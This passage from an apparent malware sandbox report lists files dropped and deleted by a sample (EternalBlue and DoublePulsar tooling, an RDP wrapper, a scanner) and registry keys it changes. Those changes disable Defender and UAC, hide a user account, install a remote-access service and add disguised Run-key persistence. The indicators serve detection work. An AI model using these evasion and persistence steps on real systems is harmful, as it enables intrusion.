- "C:\\ProgramData\\RunDLL\\Eternalblue-2.2.0.xml",
- "C:\\ProgramData\\RunDLL\\Doublepulsar-1.3.1.exe",
- "C:\\ProgramData\\RunDLL\\Eternalblue-2.2.0.exe",
- "C:\\ProgramData\\RunDLL\\rundll.exe",
- "C:\\ProgramData\\RunDLL\\start.exe",
- "C:\\ProgramData\\RunDLL\\system.exe",
- "C:\\ProgramData\\RunDLL\\2x64.dll",
- "C:\\ProgramData\\RunDLL\\2x86.dll",
- "C:\\ProgramData\\RunDLL\\adfw-2.dll",
- "C:\\ProgramData\\RunDLL\\adfw.dll",
- "C:\\ProgramData\\RunDLL\\api-ms-win-core-file-l1-2-0.dll",
- "C:\\ProgramData\\RunDLL\\System32\\api-ms-win-core-file-l1-2-0.dll",
- "C:\\ProgramData\\RunDLL\\api-ms-win-core-file-l2-1-0.dll",
- "C:\\ProgramData\\RunDLL\\System32\\api-ms-win-core-file-l2-1-0.dll",
- "C:\\ProgramData\\RunDLL\\api-ms-win-core-localization-l1-2-0.dll",
- "C:\\ProgramData\\RunDLL\\System32\\api-ms-win-core-localization-l1-2-0.dll",
- "C:\\ProgramData\\RunDLL\\api-ms-win-core-processthreads-l1-1-1.dll",
- "C:\\ProgramData\\RunDLL\\System32\\api-ms-win-core-processthreads-l1-1-1.dll",
- "C:\\ProgramData\\RunDLL\\api-ms-win-core-synch-l1-2-0.dll",
- "C:\\ProgramData\\RunDLL\\System32\\api-ms-win-core-synch-l1-2-0.dll",
- "C:\\ProgramData\\RunDLL\\api-ms-win-core-timezone-l1-1-0.dll",
- "C:\\ProgramData\\RunDLL\\System32\\api-ms-win-core-timezone-l1-1-0.dll",
- "C:\\ProgramData\\RunDLL\\api-ms-win-core-xstate-l2-1-0.dll",
- "C:\\ProgramData\\RunDLL\\System32\\api-ms-win-core-xstate-l2-1-0.dll",
- "C:\\ProgramData\\RunDLL\\api-ms-win-crt-conio-l1-1-0.dll",
- "C:\\ProgramData\\RunDLL\\System32\\api-ms-win-crt-conio-l1-1-0.dll",
- "C:\\ProgramData\\RunDLL\\api-ms-win-crt-convert-l1-1-0.dll",
- "C:\\ProgramData\\RunDLL\\System32\\api-ms-win-crt-convert-l1-1-0.dll",
- "C:\\ProgramData\\RunDLL\\api-ms-win-crt-environment-l1-1-0.dll",
- "C:\\ProgramData\\RunDLL\\System32\\api-ms-win-crt-environment-l1-1-0.dll",
- "C:\\ProgramData\\RunDLL\\api-ms-win-crt-filesystem-l1-1-0.dll",
- "C:\\ProgramData\\RunDLL\\System32\\api-ms-win-crt-filesystem-l1-1-0.dll",
- "C:\\ProgramData\\RunDLL\\api-ms-win-crt-heap-l1-1-0.dll",
- "C:\\ProgramData\\RunDLL\\System32\\api-ms-win-crt-heap-l1-1-0.dll",
- "C:\\ProgramData\\RunDLL\\api-ms-win-crt-locale-l1-1-0.dll",
- "C:\\ProgramData\\RunDLL\\System32\\api-ms-win-crt-locale-l1-1-0.dll",
- "C:\\ProgramData\\RunDLL\\System32\\api-ms-win-crt-math-l1-1-0.dll",
- "C:\\ProgramData\\RunDLL\\api-ms-win-crt-math-l1-1-0.dll",
- "C:\\ProgramData\\RunDLL\\api-ms-win-crt-multibyte-l1-1-0.dll",
- "C:\\ProgramData\\RunDLL\\System32\\api-ms-win-crt-multibyte-l1-1-0.dll",
- "C:\\ProgramData\\RunDLL\\System32\\api-ms-win-crt-private-l1-1-0.dll",
- "C:\\ProgramData\\RunDLL\\api-ms-win-crt-private-l1-1-0.dll",
- "C:\\ProgramData\\RunDLL\\api-ms-win-crt-process-l1-1-0.dll",
- "C:\\ProgramData\\RunDLL\\System32\\api-ms-win-crt-process-l1-1-0.dll",
- "C:\\ProgramData\\RunDLL\\api-ms-win-crt-runtime-l1-1-0.dll",
- "C:\\ProgramData\\RunDLL\\System32\\api-ms-win-crt-runtime-l1-1-0.dll",
- "C:\\ProgramData\\RunDLL\\api-ms-win-crt-stdio-l1-1-0.dll",
- "C:\\ProgramData\\RunDLL\\System32\\api-ms-win-crt-stdio-l1-1-0.dll",
- "C:\\ProgramData\\RunDLL\\api-ms-win-crt-string-l1-1-0.dll",
- "C:\\ProgramData\\RunDLL\\System32\\api-ms-win-crt-string-l1-1-0.dll",
- "C:\\ProgramData\\RunDLL\\api-ms-win-crt-time-l1-1-0.dll",
- "C:\\ProgramData\\RunDLL\\System32\\api-ms-win-crt-time-l1-1-0.dll",
- "C:\\ProgramData\\RunDLL\\api-ms-win-crt-utility-l1-1-0.dll",
- "C:\\ProgramData\\RunDLL\\System32\\api-ms-win-crt-utility-l1-1-0.dll",
- "C:\\ProgramData\\RunDLL\\api-ms-win-eventing-provider-l1-1-0.dll",
- "C:\\ProgramData\\RunDLL\\System32\\api-ms-win-eventing-provider-l1-1-0.dll",
- "C:\\ProgramData\\RunDLL\\cnli-0.dll",
- "C:\\ProgramData\\RunDLL\\cnli-1.dll",
- "C:\\ProgramData\\RunDLL\\coli-0.dll",
- "C:\\ProgramData\\RunDLL\\concrt140.dll",
- "C:\\ProgramData\\RunDLL\\crli-0.dll",
- "C:\\ProgramData\\RunDLL\\dmgd-1.dll",
- "C:\\ProgramData\\RunDLL\\dmgd-4.dll",
- "C:\\ProgramData\\RunDLL\\esco-0.dll",
- "C:\\ProgramData\\RunDLL\\etch-0.dll",
- "C:\\ProgramData\\RunDLL\\etchCore-0.x64.dll",
- "C:\\ProgramData\\RunDLL\\etchCore-0.x86.dll",
- "C:\\ProgramData\\RunDLL\\eteb-2.dll",
- "C:\\ProgramData\\RunDLL\\etebCore-2.x64.dll",
- "C:\\ProgramData\\RunDLL\\etebCore-2.x86.dll",
- "C:\\ProgramData\\RunDLL\\exma-1.dll",
- "C:\\ProgramData\\RunDLL\\exma.dll",
- "C:\\ProgramData\\RunDLL\\iconv.dll",
- "C:\\ProgramData\\RunDLL\\libcurl.dll",
- "C:\\ProgramData\\RunDLL\\libeay32.dll",
- "C:\\ProgramData\\RunDLL\\libiconv-2.dll",
- "C:\\ProgramData\\RunDLL\\libxml2.dll",
- "C:\\ProgramData\\RunDLL\\mfc140chs.dll",
- "C:\\ProgramData\\RunDLL\\mfc140cht.dll",
- "C:\\ProgramData\\RunDLL\\mfc140deu.dll",
- "C:\\ProgramData\\RunDLL\\mfc140enu.dll",
- "C:\\ProgramData\\RunDLL\\mfc140esn.dll",
- "C:\\ProgramData\\RunDLL\\mfc140fra.dll",
- "C:\\ProgramData\\RunDLL\\mfc140ita.dll",
- "C:\\ProgramData\\RunDLL\\mfc140jpn.dll",
- "C:\\ProgramData\\RunDLL\\mfc140kor.dll",
- "C:\\ProgramData\\RunDLL\\mfc140rus.dll",
- "C:\\ProgramData\\RunDLL\\mfcm140.dll",
- "C:\\ProgramData\\RunDLL\\mfcm140u.dll",
- "C:\\ProgramData\\RunDLL\\msvcp140.dll",
- "C:\\ProgramData\\RunDLL\\pcla-0.dll",
- "C:\\ProgramData\\RunDLL\\pcre-0.dll",
- "C:\\ProgramData\\RunDLL\\pcrecpp-0.dll",
- "C:\\ProgramData\\RunDLL\\pcreposix-0.dll",
- "C:\\ProgramData\\RunDLL\\posh-0.dll",
- "C:\\ProgramData\\RunDLL\\posh.dll",
- "C:\\ProgramData\\RunDLL\\riar-2.dll",
- "C:\\ProgramData\\RunDLL\\riar.dll",
- "C:\\ProgramData\\RunDLL\\ssleay32.dll",
- "C:\\ProgramData\\RunDLL\\tibe-1.dll",
- "C:\\ProgramData\\RunDLL\\tibe-2.dll",
- "C:\\ProgramData\\RunDLL\\tibe.dll",
- "C:\\ProgramData\\RunDLL\\trch-0.dll",
- "C:\\ProgramData\\RunDLL\\trch-1.dll",
- "C:\\ProgramData\\RunDLL\\trch.dll",
- "C:\\ProgramData\\RunDLL\\trfo-0.dll",
- "C:\\ProgramData\\RunDLL\\trfo-2.dll",
- "C:\\ProgramData\\RunDLL\\trfo.dll",
- "C:\\ProgramData\\RunDLL\\tucl-1.dll",
- "C:\\ProgramData\\RunDLL\\tucl.dll",
- "C:\\ProgramData\\RunDLL\\ucl.dll",
- "C:\\ProgramData\\RunDLL\\ucrtbase.dll",
- "C:\\ProgramData\\RunDLL\\vcamp140.dll",
- "C:\\ProgramData\\RunDLL\\vccorlib140.dll",
- "C:\\ProgramData\\RunDLL\\vcomp140.dll",
- "C:\\ProgramData\\RunDLL\\vcruntime140.dll",
- "C:\\ProgramData\\RunDLL\\x64.dll",
- "C:\\ProgramData\\RunDLL\\x86.dll",
- "C:\\ProgramData\\RunDLL\\xdvl-0.dll",
- "C:\\ProgramData\\RunDLL\\zibe.dll",
- "C:\\ProgramData\\RunDLL\\zlib1.dll",
- "C:\\ProgramData\\RunDLL\\Eternalblue-2.2.0.fb",
- "C:\\ProgramData\\RunDLL\\start.vbs",
- "C:\\rdp\\..txt",
- "C:\\rdp\\bat.bat",
- "C:\\rdp\\RDPWInst.exe",
- "C:\\rdp\\install.vbs"
- * Deleted Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\aut1E09.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\aut1E29.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\aut1E4A.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\aut1E6A.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\aut1E9A.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\aut2736.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\aut292B.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\aut2DB0.tmp",
- "C:\\Programdata\\Windows\\winit.exe",
- "C:\\ProgramData\\Windows\\__tmp_rar_sfx_access_check_15458578",
- "C:\\Users\\user\\AppData\\Local\\Temp\\aut2869.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\15487921738197713423118.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\15546765132410011601836.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\155474533927682481299984.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\155485622088868922817457.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-console-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-datetime-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-debug-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-errorhandling-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-2-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l2-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-handle-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-heap-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-interlocked-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-libraryloader-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-localization-l1-2-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-memory-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-namedpipe-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processenvironment-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-1.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-profile-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-rtlsupport-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-string-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-2-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-sysinfo-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-timezone-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-util-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-conio-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-convert-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-environment-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-filesystem-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-heap-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-locale-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-math-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-multibyte-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-private-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-process-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-runtime-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-stdio-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-string-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-time-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-utility-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\freebl3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\mozglue.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\msvcp140.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nss3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nssdbm3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\softokn3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\ucrtbase.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\vcruntime140.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\",
- "C:\\Users\\user\\AppData\\Local\\Temp\\aut8241.tmp",
- "C:\\ProgramData\\Microsoft\\Intel\\__tmp_rar_sfx_access_check_15462125",
- "C:\\Users\\user\\AppData\\Local\\Temp\\aut3AF7.tmp",
- "C:\\Users\\user\\DevManView.exe",
- "C:\\Users\\user\\Volumeid.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\aut6936.tmp",
- "C:\\Programdata\\Windowstask\\scaner.dat",
- "C:\\Programdata\\WindowsTask\\scaner.exe",
- "C:\\rdp\\__tmp_rar_sfx_access_check_15465812",
- "C:\\rdp\\run.vbs",
- "C:\\ProgramData\\install\\taskhostw.exe",
- "C:\\Windows\\Tasks\\Adobe Acrobat Update Task.job",
- "C:\\Windows\\sysnative\\Tasks\\Adobe Acrobat Update Task",
- "C:\\Windows\\Tasks\\Adobe Flash Player NPAPI Notifier.job",
- "C:\\Windows\\sysnative\\Tasks\\Adobe Flash Player NPAPI Notifier",
- "C:\\Windows\\Tasks\\GoogleUpdateTaskMachineCore.job",
- "C:\\Windows\\sysnative\\Tasks\\GoogleUpdateTaskMachineCore",
- "C:\\Windows\\Tasks\\GoogleUpdateTaskMachineUA.job",
- "C:\\Windows\\sysnative\\Tasks\\GoogleUpdateTaskMachineUA",
- "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log",
- "C:\\Windows\\sysnative\\Tasks\\OfficeSoftwareProtectionPlatform\\SvcRestartTask",
- "C:\\ProgramData\\RunDLL\\__tmp_rar_sfx_access_check_15714687"
- * Modified Registry Keys:
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Realtek HD Audio",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\John",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\John",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\DisableAntiSpyware",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\DisableAntiSpyware",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableIOAVProtection",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableBehaviorMonitoring",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableOnAccessProtection",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableRawWriteNotification",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet\\DisableBlockAltFirstSeen",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet\\LocalSettingOverrideSpynetRepting",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet\\SumbitSamplesConsent",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Exclusions",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Exclusions\\Exclusions_Paths",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Exclusions\\Paths",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Exclusions\\Paths\\C:\\Programdata",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Exclusions\\Paths\\C:\\Windows\\System32",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\ConsentPromptBehaviorAdmin",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ImmersiveShell",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ImmersiveShell\\UseActionCenterExperience",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\ImmersiveShell\\UseActionCenterExperience",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\EnableBalloonTips",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\disable",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\PushNotifications",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\PushNotifications\\ToastEnabled",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Reporting",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Reporting\\DisableEnhancedNotifications",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\UX Configuration",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\UX Configuration\\Notification_Suppress",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun\\1",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun\\2",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun\\3",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun\\4",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun\\5",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun\\6",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun\\7",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun\\8",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun\\9",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun\\10",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun\\11",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyEnable",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyServer",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections\\SavedLegacySettings",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\mlang.dll,-4612",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\IAM\\Default LDAP Account",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\IAM\\Server ID",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\Remote Manipulator System",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\Remote Manipulator System\\v4",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\Remote Manipulator System\\v4\\Server",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\Remote Manipulator System\\v4\\Server\\Parameters",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\Remote Manipulator System\\v4\\Server\\Parameters\\InternetId",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\Remote Manipulator System\\v4\\Server\\Parameters\\Options",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\Remote Manipulator System\\v4\\Server\\Parameters\\FUSClientPath",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\Remote Manipulator System\\v4\\Server\\Parameters\\CalendarRecordSettings",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\Remote Manipulator System\\v4\\Server\\Parameters\\UserAccess",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\Remote Manipulator System\\v4\\Server\\Parameters\\notification",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\PromptOnSecureDesktop",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Exclusions\\Paths\\C:\\programdata",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths",
- "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\Explorer",
- "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\Explorer\\DisableNotificationCenter",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\Remote Manipulator System\\v4\\Server\\Parameters\\Password",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Realtek HD Audio",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowSuperHidden",
- "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Tracing\\taskhostw_RASAPI32",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\taskhostw_RASAPI32\\EnableFileTracing",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\taskhostw_RASAPI32\\EnableConsoleTracing",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\taskhostw_RASAPI32\\FileTracingMask",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\taskhostw_RASAPI32\\ConsoleTracingMask",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\taskhostw_RASAPI32\\MaxFileSize",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\taskhostw_RASAPI32\\FileDirectory",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\RManService",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RManService",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RManService\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RManService\\Start",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RManService\\ErrorControl",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RManService\\ImagePath",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RManService\\DisplayName",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RManService\\WOW64",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RManService\\ObjectName",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RManService\\Description",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\AppMgmt\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\AppIDSvc\\Start",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\VaultSvc\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\AppMgmt\\Start",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\PolicyAgent\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Browser\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RManService\\FailureActions",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-100",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-101",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-103",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-102",
